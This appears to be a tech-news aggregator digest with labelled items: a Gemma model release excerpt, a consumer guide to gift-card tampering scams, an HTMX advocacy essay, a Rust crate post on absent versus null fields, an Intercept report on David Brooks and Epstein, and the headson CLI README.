Multimodality: T5Gemma 2 models can understand and process images alongside text. By utilizing a highly efficient vision encoder, the models can seamlessly perform visual question answering and multimodal reasoning tasks.
Extended long context: We've dramatically expanded the context window. Leveraging Gemma 3's alternating local and global attention mechanism, T5Gemma 2 can handle context windows of up to 128K tokens.
Massively multilingual: Trained on a larger, more diverse dataset, these models now support over 140 languages out of the box.

Performance

T5Gemma 2 sets a new standard for what compact encoder-decoder models can achieve. Our new models demonstrate strong performance across key capability areas, inheriting the powerful multimodal and long-context features from the Gemma 3 architecture.

Pre-training performance of Gemma 3, T5Gemma and T5Gemma 2 across five unique capabilities.

As shown in the charts above, T5Gemma 2 delivers:

Strong multimodal performance , outperforming Gemma 3 on several benchmarks. We adapt text-only Gemma 3 base models (270M and 1B) into effective multimodal encoder-decoder models.
Superior long-context capability , with substantial quality gains over Gemma 3 and T5Gemma. Using a separate encoder makes T5Gemma 2 better at handling long-context problems.
Improved general capabilities . Across coding, reasoning and multilingual tasks, T5Gemma 2 generally surpasses its corresponding Gemma 3 counterpart.

Post-training performance. Note: we are not releasing any post-trained / IT checkpoints. These results here are only for illustration, where we performed a minimal SFT without RL for T5Gemma 2. Also note pre-training and post-training benchmarks are different, so scores are not comparable across plots.

Similar to the original T5Gemma, we find that the post-training performance of T5Gemma 2 generally yields better results than its decoder-only counterparts. This makes T5Gemma 2 suitable for both large language model research as well as downstream applications.

Getting started

We’re looking forward to seeing what the community builds with T5Gemma 2. This release includes pre-trained checkpoints, designed to be post-trained by developers for specific tasks before deployment.

These pre-trained checkpoints are available now for broad use across several platforms:

GCDB’s Guide to Gift Card Tampering Scams

Daring Fireball

gcdb.com.au

2025-12-18 19:44:36

Gift Card Database (GCDB) has a guide to spotting tampered gift cards: Whilst it may seem unusual, you should tear open this version of Apple gift card before you purchase it so that you can inspect the redemption code. Look for missing or scratched off characters (it may be as subtle as changin...

Original Article

When you hear the term ‘gift card scam’ you may think of vulnerable people being tricked into buying gift cards to pay off fake debts. In recent years, however, there has been a rise in sophisticated gift card tampering scams. These are often so cunning and well-executed that anyone could fall victim to them.

This article breaks down some of the most common examples of gift card tampering that you will find in Australia and what you should do if you are affected. Whilst the chances of you buying a tampered gift card remain relatively low, it never hurts to be vigilant.

At the time of writing, the main gift cards targeted by scammers in Australia are:

Apple gift cards
Prepaid Visa, Mastercard and Eftpos gift cards
TCN multi-retailer gift cards

Apple gift cards

Physical Apple gift cards sold in stores such as Woolworths and Coles are a prime target for tampering. Whenever these supermarkets run one of their frequent promotions on Apple gift cards, there are always numerous reports of people buying tampered cards.

The way this scam works is that criminals steal unactivated Apple gift cards from stores, carefully remove or damage the redemption codes inside, reseal them and then place them back on the shelves for unsuspecting customers to purchase.

When you purchase one of these tampered Apple gift cards, you are paying to activate a code that only the criminal has access to. The code inside your card – if there even is one – won’t work as it has either been damaged or belongs to an entirely different Apple gift card.

Version 2 Apple gift cards

Most physical Apple gift cards you’ll find nowadays are the version 2 variety. As you can see from the image above, these are distinguished by their crimped edges and vertical tear-to-reveal barcode on the back.

When you tear open the gift card, you’ll find a credit card sized piece of cardboard containing a redemption code on one side and an activation barcode on the other.

Whilst it may seem unusual, you should tear open this version of Apple gift card before you purchase it so that you can inspect the redemption code. Look for missing or scratched off characters (it may be as subtle as changing an L to look like an I).

If you’re satisfied that the redemption code is legible and undamaged, you can purchase the gift card by scanning the barcode on the other side. If staff question your decision to open it first, calmly explain why you were checking it and refer them to the image above if it helps.

The one major downside of this precaution is that it requires you to basically destroy the gift card packaging so if it’s intended as a present you may just have to give them the smaller inner card instead. Still, it’s better to be safe than sorry.

Version 1 Apple gift cards

These older Apple gift cards are still found in many stores despite being superseded by the version 2 variety in early 2025. Inside version 1 Apple gift cards you will find a sheet containing the redemption code and Apple logo sticker whilst the activation barcode is located on the outside of the gift card packet.

When you open a tampered version 1 Apple gift card you may notice:

The serial number on the inside does not match the one on the outside
The redemption code has been removed or damaged (this could be as subtle as changing one character to look like another)
It’s difficult to open because of the glue used to reseal the packaging
The denomination on the card inside is different to the one printed on the outside (e.g. one says $20 and the other says $100)

It is often impossible to notice any of these signs without actually opening the gift card. For that reason, we recommend unsealing version 1 Apple gift cards before you pay for them so that you can at least confirm that the two serial numbers match and that the redemption code is undamaged.

Unlike the version 2 Apple gift cards which must be torn apart to be opened, the version 1 Apple gift card can be discreetly inspected prior to purchase with everything bar the seal at the bottom remaining intact.

Prepaid Visa, Mastercard and Eftpos gift cards

Physical prepaid Visa, Mastercard and Eftpos gift cards are targeted by criminals because they can easily be spent at almost any merchant. This scam mostly affects Vanilla Visa , Vanilla Mastercard , Coles Mastercard and Activ Visa gift cards in Australia.

Visa and Mastercard gift cards

With these gift cards, common signs of tampering include:

Missing card numbers on the front
Missing security code (CVV) on the back

This scam works similarly to the Apple one mentioned earlier. Criminals steal unactivated Visa and Mastercard gift cards from stores, record the card details, remove some of this information and then place them back in stores for people to purchase and activate.

When you purchase one of these tampered gift cards, you are unable to use it online as you don’t have access to all sixteen digits or the security code (CVV). You also won’t be able to use the card physically if the scammers have reset its magnetic stripe.

Unfortunately, there’s often no easy way to check prepaid Visa and Mastercard gift cards for signs of tampering before you purchase them. If your gift card appears fine from the outside, you should open it as soon as you pay and look for any missing details.

Whilst Activ Visa gift cards include both a CVV and PIN, Vanilla Visa, Vanilla Mastercard and Coles Mastercard gift cards only include a CVV (security code) so don’t worry if you have one of those gift cards and it doesn’t display a PIN.

Also, some Vanilla Visa, Vanilla Mastercard or Coles Mastercard gift cards have stickers for barcodes but that’s just the way they are manufactured. There is a fake barcode scam but it appears to only be affecting Eftpos gift cards.

Eftpos gift cards

Physical prepaid Eftpos gift cards likely aren’t as much of a target for scammers because they can only be used in-person by swiping the cards. That being said, we have seen several instances of tampered TCN Eftpos and Perfect Eftpos gift cards so they aren’t entirely safe either.

Scammers take photocopies of the activation barcodes for Eftpos gift cards and stick them on top of the barcodes for cards sold in stores. When you buy one of these tampered Eftpos gift cards by scanning the fake barcode, you’re actually activating the one in the scammer’s possession.

This type of scam is easy for them to perform because many Eftpos gift cards are still sold in open packaging where the physical card is simply stuck to the front of a piece of cardboard. Thankfully, both TCN Eftpos and Perfect Eftpos gift cards appear to be transitioning to more tamper-resistant packaging which should make this scam much harder to pull off.

If you’re buying a prepaid Eftpos gift card where the physical card is exposed, check that there isn’t a low quality fake barcode obscuring the real one. If there is, make sure you report it to staff at that store.

TCN multi-retailer gift cards

In mid-2025 we started seeing a dramatic rise in scams targeting TCN (The Card Network) multi-retailer gift cards (e.g. TCN Her, Him, Teen, Kids, Baby etc).

The way this scam works is that criminals record the details of physical TCN multi-retailer gift cards sold in stores such as Coles and Woolworths. When someone buys the gift card, the scammer is then able to remotely spend it or swap it for another gift card via the TCN website.

In some cases, the scammers may leave behind physical signs of tampering which you can check for before you pay for the gift card:

Missing or defaced card numbers – there should be nineteen digits beginning with 5021
Revealed or removed PINs – scratch it yourself to confirm all four digits are present

However, this doesn’t always work because often the scammers will leave no indications of tampering and also reset the magnetic stripe on the gift card, rendering it unusable for in-person transactions.

In August 2025, YouTuber Simon Dean uncovered poor security practices on the TCN website that made it possible for scammers to ascertain each card’s PIN using only the numbers that are openly displayed on physical TCN gift cards. Despite this vulnerability being fixed, TCN gift card scams persist.

The TCN gift cards most at risk of this scam appear to be the ones that can be used at JB Hi-Fi and The Good Guys. This is presumably why TCN temporarily removed the ability to use their gift cards on the JB Hi-Fi website in September 2025.

Scammers also seem to prefer higher value denominations like the $20-500 variable load gift cards as people routinely load the maximum amount of $500 onto each of those cards to pay for large purchases.

It’s worth mentioning that it’s normal for newly bought TCN gift cards to display an error when you attempt to swap them for another gift card on the TCN website as you usually have to register them first. If you still encounter any issues then you may have a tampered or defective card.

What to do if you buy a tampered gift card

If you do purchase a gift card that has been tampered with, you are entitled to a refund or replacement. How you go about obtaining it depends on where you bought the tampered gift card.

For Woolworths and Big W purchases you should contact Everyday Gifting (formerly known as Woolworths Gift Cards). They can be reached by email , live chat or you can call them on 1300 10 1234 .

For tampered gift cards purchased at Coles, you should speak to Coles customer care . You can call them on 1800 061 562 , submit an enquiry on their website or message them through their Facebook page .

If you purchased a tampered gift card from another store (e.g. ALDI, Kmart, Target etc) you should contact their customer support.

It can sometimes possible to obtain a refund directly from the physical store you purchased a tampered gift card from but you are usually better off going through their official support channels rather than harassing in-store staff who are likely powerless to solve the issue.

With the possible exception of Apple who are reportedly quite good at solving issues with tampered Apple gift cards, some of the other major gift card companies are known to be slow and unhelpful so you may only want to seek a refund from them as a last resort.

Whether you obtain a refund from the store or gift card company, it’s a good idea to contact both so that the store can be made aware of the fact that they’re selling tampered gift cards and the gift card company can be given a chance to suspend the card before the scammer uses it.

Always hang onto your receipt and activation slip (the smaller receipt that accompanies a gift card purchase) as these may be needed when submitting your claim for a refund. Other evidence of your purchase may also suffice (e.g. bank statement, rewards account activity etc).

Other gift card scams

These are the most common gift card scams we’ve observed in Australia but it’s entirely possible that scammers will branch out to other gift cards or invent new ways of tampering. If you spot any new gift card scams, let us know so that we can keep this article up to date.

If you’re a buyer or recipient of prepaid Visa and Mastercard gift cards, you might also want to know about BIN attacks. This is where criminals brute force different card number, expiry and security code combinations until they find ones that work.

Almost all prepaid Visa and Mastercard gift cards are susceptible to BIN attacks. Whilst the chances of it happening to you are low, we still recommend using Visa and Mastercard gift cards sooner rather than later as the longer you leave them, the higher the chance of a successful attack.

If you have a prepaid Visa or Mastercard and notice that it has been used to make transactions you didn’t authorise, report it immediately to the gift card company. They can issue you a replacement gift card but it’s often a lengthy process that requires a lot of back and forth.

Possible solutions

Changes to the way gift cards are produced and sold could help to eliminate tampering scams.

Whilst gift card companies are continuing to introduce new tamper-resistant packaging, scammers always seem to find a way in. Ironically, the more tamper-resistant they make gift cards, the harder it is for consumers to check them before purchasing.

Stores that sell physical gift cards targeted by scammers could choose to sell them from behind the counter instead of on public display. This is a strategy we’ve already seen employed by some Woolworths locations with Apple gift cards but it could be expanded to include other stores and gift cards as well.

Gift card companies could also change how their gift cards work. When you buy a True Rewards Visa gift card , for example, your receipt contains a code that you use to add the card to your mobile wallet. The “gift card” on the shelf in the store contains no sensitive information.

These possible solutions aren’t perfect but they do highlight some of the changes that gift card companies and sellers could make to stop their customers from falling victim to tampering scams.

Conclusion

The chances of you buying a tampered Apple, TCN or prepaid Visa, Mastercard or Eftpos gift card are low but you should still know what signs to look for, if only to save yourself the potential headache of having to obtain a refund.

If you’re buying a physical Apple gift card, open it and confirm that the internal and external serial numbers match and that the redemption code hasn’t been damaged or removed. If you’re buying an Eftpos gift card in open packaging, check that it doesn’t have a fake barcode before you pay for it.

Prepaid Visa and Mastercard gift cards can’t usually be inspected for signs of tampering before you buy them. However, you can check them immediately after paying and then, if necessary, begin the process of obtaining a refund.

TCN multi-retailer gift cards (TCN Him, Her, Teen, Kids etc) gift cards should be inspected for missing card numbers (there should be nineteen) and revealed or removed PINs. However, a gift card not displaying these signs may still be compromised.

A gift card that has been opened by you can still be gifted to someone so there’s no reason not to err on the side of caution and check. After all, the recipient would likely be much more disappointed by an unusable gift card than an opened one.

Featured image credit: GCDB, Apple, InComm Payments, The Card Network

Please Just Fucking Try HTMX

Lobsters

pleasejusttryhtmx.com

2025-12-18 19:43:17

Comments...

Original Article

A measured-yet-opinionated plea from someone who's tired of watching you suffer

Look. I'm not going to call you a fucking moron every other sentence. That's been done. It's a whole genre now. And honestly? HTMX doesn't need me to scream at you to make its point.

The sweary web manifesto thing is fun—I've enjoyed reading them—but let's be real: yelling " JUST USE HTML " or " JUST FUCKING USE REACT " hasn't actually changed anyone's stack. People nod, chuckle, and then go right back to fighting their raw JS or their webpack config. ¹

So I'm going to try something different. I'll still swear (I'm not a fucking saint), but I'm also going to show you something , in the course of imploring you, for your own sanity and happiness, to at least please just try htmx.

The False Choice

Right now, the shouters are offering you two options:

Option A: "Just use HTML!" And they're not wrong. HTML is shockingly capable. Forms work. Links work. The <dialog> element exists now. The web was built on this stuff and it's been chugging along since Tim Berners-Lee had hair. And a little tasteful CSS can go a long motherfucking way .

But sometimes—and here's where it gets uncomfortable—you actually do need a button that updates part of a page without reloading the whole damn thing. You do need a search box that shows results as you type. You do need interactivity.

So you turn to:

Option B: React (or Vue, or Svelte, or Angular if you're being punished for something).

And suddenly you've got:

A package.json with 847 dependencies
A build step that takes 45 seconds (if the CI gods are merciful)
State management debates polluting your pull requests
Junior devs losing their minds over why useEffect runs twice
A bundle size that would make a 56k modem weep

For what? A to-do list? A contact form? A dashboard that displays some numbers from a database?

This is the false choice: raw HTML's limitations or JavaScript framework purgatory.

There's a third option. I'm begging you, please just try it.

HTMX: The Middle Path

What if I told you:

Any HTML element can make an HTTP request
The server just returns HTML (not JSON, actual HTML)
That HTML gets swapped into the page wherever you want
You write zero JavaScript
The whole library is ~14kb gzipped

That's HTMX. That's literally the whole thing.

Here's a button that makes a POST request and replaces itself with the response:

<button hx-post="/clicked" hx-swap="outerHTML">
    Click me
</button>

When you click it, HTMX POSTs to /clicked , and whatever HTML the server returns replaces the button. No fetch() . No setState() . No npm install . No fucking webpack config.

The server just returns HTML. Like it's 2004, except your users have fast internet and your server can actually handle it. It's the hypermedia architecture the entire freaking web was designed for, but with modern conveniences.

Don't Believe Me? Click Things.

This page uses HTMX. These demos actually work.

Demo 1: Click a Button

This button makes a POST request and swaps in the response:

Demo 2: Load More Content

This button fetches additional content and appends it below:

Here's some initial content.

Demo 3: Live Search

Type something—results update as you type (debounced, of course):

Results will appear here...

That's HTMX. I didn't write JavaScript to make those work. I wrote HTML attributes. The "server" (mocked client-side for this demo, but the htmx code is real) returns HTML fragments, and HTMX swaps them in. The behavior is right there in the markup—you don't have to hunt through component files and state management code to understand what a button does. HTMX folks call this "Locality of Behavior" and once you have it, you'll miss it everywhere else.

The Numbers

Anecdotes are nice. Data is better.

A company called Contexte rebuilt their production SaaS app from React to Django templates with HTMX. Here's what happened:

67%

less code

(21,500 → 7,200 lines)

96%

fewer JS dependencies

(255 → 9 packages)

88%

faster builds

(40s → 5s)

50-60%

faster page loads

(2-6s → 1-2s)

They deleted two-thirds of their codebase and the app got better . Every developer became "full-stack" because there wasn't a separate frontend to specialize in anymore.

Now, they note this was a content-focused app and not every project will see these exact numbers. Fair. But even if you got half these improvements, wouldn't that be worth a weekend of experimentation?

For the Skeptics

"But what about complex client-side state management?"

You probably don't have complex client-side state. You have forms. You have lists. You have things that show up when you click other things. HTMX handles all of that.

If you're building Google Docs, sure, you need complex state management. But you're not building Google Docs. You're building a CRUD app that's convinced it's Google Docs.

"But the React ecosystem!"

The ecosystem is why your node_modules folder is 2GB. The ecosystem is why there are 14 ways to style a component and they all have tradeoffs. The ecosystem is why "which state management library" is somehow still a debate.

HTMX's ecosystem is: your server-side language of choice. That's it. That's the ecosystem.

"But SPAs feel faster!"

After the user downloads 2MB of JavaScript, waits for it to parse, waits for it to execute, waits for it to hydrate, waits for it to fetch data, waits for it to render... yes, then subsequent navigations feel snappy. Congratulations.

HTMX pages load fast the first time because you're not bootstrapping an application runtime. And subsequent requests are fast because you're only swapping the parts that changed.

"But I need [specific React feature]!"

Maybe you do. I'm not saying React is never the answer. I'm saying it's the answer to about 10% of the problems it's used for, and the costs of reaching for it reflexively are staggering.

Most teams don't fail because they picked the wrong framework. They fail because they picked too much framework. HTMX is a bet on simplicity, and simplicity tends to win over time.

When NOT to Use HTMX

I'm not a zealot. HTMX isn't for everything.

Real-time collaborative editing (Google Docs, Figma)
Heavy client-side computation (video editors, CAD tools)
Offline-first applications (though you can combine approaches)
Genuinely complex UI state (not "my form has validation" complex—actually complex)

But be honest with yourself: is that what you're building?

Or are you building another dashboard, another admin panel, another e-commerce site, another blog, another SaaS app that's fundamentally just forms and tables and lists? Be honest. I won't tell anyone. We all have to pay the bills.

For that stuff, HTMX is embarrassingly good. Like, "why did we make it so complicated" good. Like, "oh god, we wasted so much time" good.

So Just Try It

You've tried React. You've tried Vue. You've tried Angular and regretted it. You've tried whatever meta-framework is trending on Hacker News this week.

Just try HTMX. One weekend. Pick a side project. Pick that internal tool nobody cares about. Pick the thing you've been meaning to rebuild anyway.

Add one <script> tag. Write one hx-get attribute. Watch what happens.

If you hate it, you've lost a weekend. But you won't hate it. You'll wonder why you ever thought web development had to be so fucking complicated.

Learn more:
htmx.org — The official site and docs
hypermedia.systems — The free book on hypermedia-driven apps

¹ Honor obliges me to admit this is not literally true. bettermotherfuckingwebsite.com is a fucking pedagogical masterpiece and reshaped how I built my own site. But let's not spoil the bit... ↩

Stop Losing Intent: Absent, Null, and Value in Rust

Lobsters

minikin.me

2025-12-18 19:03:49

Comments...

Original Article

When you build production APIs long enough, you learn a painful lesson: most bugs aren’t about values — they’re about intent .

A request payload isn’t just “data”. It’s a command :

“Don’t touch this field.”
“Clear this field.”
“Set this field to X.”

JSON gives you three distinct signals for that:

Missing field ( {} ) → no opinion / leave unchanged
Explicit null ( {"name": null} ) → clear the value
Concrete value ( {"name": "Alice"} ) → set it

If you collapse these states, you will eventually ship a bug that overwrites or clears data incorrectly.It may be rare. It will be expensive.

Real example: A mobile app sends {"bio": null} to clear a user’s bio. Your server deserializes it as None , treats it as “not provided”, and silently ignores the update. User reports: “I can’t delete my bio.” You spend hours debugging, only to find the issue isn’t in the app or the database - it’s in how you modeled the request.

That’s what presence-rs exists for: representing “missing vs null vs present” explicitly in the type system .

Repository: https://github.com/minikin/presence-rs

Getting Started

Add presence-rs to your project:

[dependencies]
presence-rs = "0.1"
serde = { version = "1.0", features = ["derive"] }

Basic usage:

use presence_rs::Presence;

let absent: Presence<String> = Presence::Absent;
let null: Presence<String> = Presence::Null;
let value: Presence<String> = Presence::Some("Alice".to_string());

if value.is_some() {
    println!("We have a value!");
}

The Core Idea

Option<T> has two states. But patch/update models need three.

So Presence<T> makes intent first-class:

Presence::Absent → not provided
Presence::Null → explicitly null
Presence::Some(T) → provided value

This is the whole point: you can’t ignore the distinction anymore . The compiler forces you to decide.

Why This Matters

Data safety: fewer accidental destructive updates

If you treat “missing” and “null” the same, you can’t implement the common rules safely:

Missing: keep existing value
Null: clear it
Value: set it

People think they handle this with convention, but conventions leak:

client libraries differ
“frontend sends null sometimes” becomes a thing
one endpoint treats null as “clear”, another treats it as “ignore”
migrations and refactors regress behavior

Presence<T> makes the semantics unambiguous.

It improves API readability and reviewability

When a reviewer sees:

name: Option<Option<String>>

they need to stop and decode what the two layers mean. Half the time the meaning isn’t consistent across the codebase.

When they see:

name: Presence<String>

the meaning is clear immediately: you’re modeling presence, not optionality.

It scales across systems

This tri-state shows up in:

PATCH endpoints
GraphQL-style “undefined vs null”
SQL “not provided vs set NULL”
config overlays / layered settings
partial updates in event sourcing / CQRS

Once you have the right abstraction, you stop rewriting the same fragile glue.

”But `Option<Option<T>>` Already Gives Three States” — Why Not Use It?”

You’re right: it can represent three states:

None → absent
Some(None) → null
Some(Some(v)) → present

So why introduce Presence<T> ? Here’s the comparison:

Aspect	`Option<Option<T>>`	`Presence<T>`
Readability	`Some(None)` is ambiguous	`Presence::Null` is explicit
Self-documenting	Meaning encoded in position	Meaning encoded in variant names
Accidental collapse	Easy with `.flatten()`	Must be explicit
Match ergonomics	Nested patterns are awkward	Clean, flat variants
Code review clarity	Requires comments/context	Intent is immediately clear
Domain modeling	Generic nesting	Purpose-built type

Let’s dig into why this matters:

Nesting is not self-documenting

Option<Option<T>> encodes meaning in position , not in names . You constantly ask:

“Is outer None absent or null?”
“Is inner None absent or null?”
“Which layer do we use for ‘clear’ in this endpoint?”

With Presence , the names carry intent: Absent , Null , Some .

It’s easy to accidentally collapse states

Common patterns silently destroy semantics:

let x: Option<Option<T>> = ...;
let y: Option<T> = x.flatten(); // boom: you lost the "null vs absent" distinction

Or:

if x.is_none() { /* which "none" did you mean? */ }

With Presence<T> , you can still choose to collapse states — but you have to do it deliberately.

Ergonomics and correctness in business logic

Real code needs readable branching:

match update.name {
    Presence::Absent => { /* keep */ }
    Presence::Null => { /* clear */ }
    Presence::Some(v) => { /* set */ }
}

Now compare it to nested Option :

match update.name {
    None => { /* ??? */ }
    Some(None) => { /* ??? */ }
    Some(Some(v)) => { /* ??? */ }
}

Even if you comment it, the structure fights you. Multiply this across 30 fields and 20 endpoints and it becomes the place where bugs hide.

Your domain model deserves a domain type

Option<Option<T>> is a clever encoding. Presence<T> is a concept.

At a fundamental level, this is the real argument: encode domain semantics in types, not in conventions. Because conventions don’t compose, and they don’t survive teams.

A Concrete Example: PATCH Update Done Right

Let’s model the typical update rule:

Absent → no change
Null → clear
Some(v) → set v

use presence_rs::Presence;
use serde::{Deserialize, Serialize};

// Your existing domain model - fields are Option<T> because they're nullable
#[derive(Debug)]
struct User {
    id: String,
    name: Option<String>,
    email: Option<String>,
    bio: Option<String>,
}

// The patch request - fields are Presence<T> to distinguish absent/null/value
#[derive(Debug, Deserialize)]
struct UserPatch {
    #[serde(default)]  // Missing fields deserialize as Presence::Absent
    name: Presence<String>,
    #[serde(default)]
    email: Presence<String>,
    #[serde(default)]
    bio: Presence<String>,
}

// Reusable helper that encodes your update semantics once
fn apply_field<T>(target: &mut Option<T>, update: Presence<T>) {
    match update {
        Presence::Absent => {},                  // Field missing from JSON → no change
        Presence::Null => *target = None,        // Field is null in JSON → clear
        Presence::Some(v) => *target = Some(v),  // Field has value → set it
    }
}

fn apply_patch(user: &mut User, patch: UserPatch) {
    apply_field(&mut user.name, patch.name);
    apply_field(&mut user.email, patch.email);
    apply_field(&mut user.bio, patch.bio);
}

What this gives you:

{} → no fields change
{"name": null} → clears name, leaves email and bio alone
{"name": "Alice", "bio": null} → sets name, clears bio, leaves email alone

This is exactly the kind of code that stays correct during refactors because it’s explicit.

Ecosystem Integration

Presence<T> works seamlessly with the Rust ecosystem you’re already using:

Serde (JSON/API serialization):

#[derive(Deserialize)]
struct UpdateRequest {
    #[serde(default)]  // Absent if not in JSON
    field: Presence<String>,
}

Web frameworks (Axum, Actix, Rocket): Works out of the box with any framework that uses serde for request deserialization.

Database operations (sqlx, diesel): Map Presence<T> to your SQL update strategy:

Absent → skip field in UPDATE statement
Null → SET field = NULL
Some(v) → SET field = $1

GraphQL: Naturally models the GraphQL distinction between undefined (absent) and null.

This isn’t a new pattern you need to teach your stack, it’s a formalization of what you’re already doing ad-hoc.

Practical Tips for Rolling This Out

A small type is easy to adopt, but consistency matters. A few battle-tested rules:

Write down semantics per field : is Null allowed? what does it mean?
Reject ambiguous payloads early : if “clear” isn’t supported, return a 4xx on Null .
Prefer explicit conversions at boundaries:
- decode request → Presence<T>
- map to domain update intent
- apply update in one place

The goal is to make “what happens on Absent/Null/Value” obvious and testable.

When NOT to Use `Presence<T>`

Like any abstraction, Presence<T> has its place. Consider simpler approaches when:

Full replacement updates: If your API always replaces the entire resource (PUT semantics), standard Option<T> is sufficient. You don’t need tri-state when every update is total.

Internal-only APIs: If you control both client and server tightly (monolith, microservices with shared types), conventions might be enough. The type system shines most at boundaries you don’t control.

No-op semantics: If your domain genuinely treats “missing” and “null” identically, don’t introduce artificial distinction. Use the simplest model that matches your business rules.

High-throughput, low-ambiguity scenarios: If you’re processing millions of updates per second and the absent/null distinction never matters in practice, the extra clarity might not justify the mental overhead.

The rule: use Presence<T> when the cost of getting absent/null wrong exceeds the cost of being explicit . For PATCH endpoints, user-facing APIs, and multi-team systems, that bar is usually low.

Conclusion

Presence<T> is deliberately small: it takes a common footgun—“missing vs null”—and turns it into an explicit, readable, matchable type.

You can still write bad logic with Presence<T> , sure — but you can’t accidentally forget there are three states. That’s the win.

If your system has patch semantics, schema-driven models, or any API where “not provided” is different from “clear it”, encoding this in the type system is one of those changes that turns “it might work” into “it will work” —because the compiler forces you to handle intent, not just values.

Try it:

cargo add presence-rs

Check out the repository for examples, documentation, and contributions.

NY Times’ David Brooks Said There’s Too Much Focus on Jeffrey Epstein. Here He Is Hanging With Epstein.

Intercept

theintercept.com

2025-12-18 18:58:13

New York Times columnist David Brooks appears at a 2011 dinner with Jeffrey Epstein in the latest set of photos from the House Oversight Committee. The post NY Times’ David Brooks Said There’s Too Much Focus on Jeffrey Epstein. Here He Is Hanging With Epstein. appeared first on The Intercept....

Original Article

The Epstein story? Count him in.

In November, in the wake of the release of tens of thousands of new documents related to Jeffrey Epstein, New York Times columnist David Brooks announced his intention to sit this one out.

In a column titled “The Epstein Story? Count Me Out,” Brooks, a mainstay of the anti-Trump center-right, dismissed the furor over Epstein as an extension of QAnon, the far-right conspiracy cult that emerged during the first Trump administration and centered around increasingly deranged myths around a pedophile cabal that supposedly ran the world. The case was like catnip to QAnon types, Brooks argued, because it revealed that a powerful, well-connected financier really was engaged in sex-trafficking.

Brooks didn’t mention that he had not only met Epstein in the past, but also attended a dinner alongside the infamous sex trafficker in 2011.

The connection was only revealed Thursday when photos of Brooks at an event with Epstein emerged as part of a release of a new tranche of documents by the Democratic members of the House Committee on Oversight, which has been investigating the Epstein saga and has access to reams of documents handed over by the estate of the late pedophile.

It was not immediately clear when or where the event took place, but a spokesperson for the Times told The Intercept that it was a “widely-attended dinner” in 2011 that Brooks attended in the normal course of his journalistic duties. Brooks did not immediately respond to a request for comment.

“As a journalist, David Brooks regularly attends events to speak with noted and important business leaders to inform his columns, which is exactly what happened at this 2011 event,” Times spokesperson Danielle Rhoades Ha wrote. “Mr. Brooks had no contact with him before or after this single attendance at a widely-attended dinner.”

David Brooks at a 2011 dinner that Jeffrey Epstein attended.
Photo: House Oversight Committee

Brooks is not the first Timesman to appear prominently in the recent disclosures around Epstein. In November, when the GOP-controlled Oversight Committee dumped thousands of documents gleaned from an email inbox belonging to Epstein, it revealed new depths to the relationship between Epstein and Landon Thomas Jr. , a former Times reporter who was fired in 2018 after it emerged that he’d solicited a donation to a charity from Epstein. Thomas, a business reporter, appeared in numerous emails with Epstein in which Epstein teased information he said he had regarding Donald Trump. Those tips were not made public, and neither Thomas nor the Times have commented on why he did not appear to have reported them out.

Thursday’s release of documents also included a number of photos of prominent thinkers and political operatives known to be in Epstein’s orbit in later years, including the leftist intellectual Noam Chomsky and the right-wing provocateur and erstwhile Trump confidant Steven K. Bannon.

The photos came out just a day ahead of the deadline for the release of the so-called Epstein Files by the Department of Justice, which is mandated by congressional Epstein Files Act to drop documents related to its investigations into Epstein on Friday.

“The Epstein case is precious to the QAnon types because here, in fact, was a part of the American elite that really was running a sex abuse ring,” Brooks wrote in his November column. “So, of course, they leap to the conclusion that Epstein was a typical member of the American establishment, not an outlier. It’s grooming and sex trafficking all the way down.”

A spokesperson for the Democratic members of the Oversight Committee did not immediately respond to a request for clarification about the details of the photos, but according to Politico , the Epstein estate provided the images without context after a subpoena.

Huge Trucks Constantly Take This Illegal Short Cut. The NYPD Doesn't Seem to Care

hellgate

hellgatenyc.com

2025-12-18 18:50:03

Michael Hassin has made it his mission to stop Manhattan-bound trucks from leaving the truck route and using Clinton Street to get to East Houston Street....

Original Article

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headson: head/tail for structured data - summarize/preview JSON/YAML and source code

Lobsters

github.com

2025-12-18 18:39:35

Comments...

Original Article

Features · Install · Usage · Python bindings

head / tail for JSON, YAML — but structure‑aware. Get a compact preview that shows both the shape and representative values of your data, all within a strict byte budget. (Just like head / tail , hson can also work with unstructured text files.)

Available as:

CLI: Install · Usage
Python library: Install · Usage

Features

Budgeted output: specify exactly how much you want to see (bytes/chars/lines; per-file and global caps)
Output formats: auto | json | yaml | text with styles strict | default | detailed
Structure-aware parsing: full JSON/YAML parsing (preserves tree shape under truncation)
Source code support: heuristic, indentation-aware summaries that keep lines atomic
Multi-file mode: preview many files at once (paths and --glob ... ) with shared or per-file budgets
Repo-aware ordering: in git repos, frequent+recent files show up first (rarely touched files drift to the end; mtime fallback)
grep -like search and tree -like view: --grep <regex> and --tree emulate the workflows while still summarizing file contents inline
Fast: processes gigabyte‑scale files in seconds (mostly disk‑bound)
Available as a CLI app and as a Python library

Extra features

Source code mode

For source code files, headson uses an indentation-aware heuristic to build an outline, then picks representative lines from across that structure (while keeping lines atomic so omissions never split a line). Syntax highlighting is available when colors are enabled.

Learn more: Source code support

Grep mode

Guarantee that matching keys/values stay in view under tight budgets (supports multi-file mode via --glob ).

Tree mode

Preview many files at once in a directory tree layout (inline previews, round‑robin fairness; supports multi-file mode via --glob ).

Sorting

In multi-file mode, inputs are ordered so frequently and recently touched files show up first, and rarely touched files drift to the end (using git history when available, with mtime fallback). Use a global byte budget ( --global-bytes ) to get an up‑to‑date repo snapshot within a strict overall limit (and --chars when you want a per-file character cap).

Install

Using Cargo:

Note: the package is called headson , but the installed CLI command is hson . All examples below use hson ... .

From source:

cargo build --release
target/release/hson --help

Usage

INPUT (optional, repeatable): file path(s). If omitted, reads from stdin. Multiple input files are supported.
Prints the preview to stdout. On parse errors, exits non‑zero and prints an error to stderr.

Quick examples

Peek a JSON stream from stdin:

curl -sS 'https://pokeapi.co/api/v2/pokemon?limit=151' | hson -c 800

Preview many files with a single total budget:

hson -c 200 -C 1200 logs/*.json

Machine-readable preview (strict JSON):

hson -c 200 -f json -t strict data.json

YAML with detailed comments:

hson -c 400 -f yaml -t detailed config.yaml

Keep matches visible (grep-like) while still summarizing structure:

hson --grep 'error|warning' -c 200 -C 1200 logs/*.json

Tree-like view with inline previews:

hson --tree --glob 'src/**/*' -c 160 -C 1200

Source code outline (keeps lines intact; omits blocks under tight budgets):

Common flags

-c, --bytes <BYTES> : per‑file output budget (bytes). For multiple inputs, default total budget is <BYTES> * number_of_inputs .
-u, --chars <CHARS> : per‑file output budget (Unicode code points). Behaves like --bytes but counts characters instead of bytes.
-C, --global-bytes <BYTES> : total output budget across all inputs. With --bytes , the effective total is the smaller of the two.
-f, --format <auto|json|yaml|text> : output format (default: auto ).
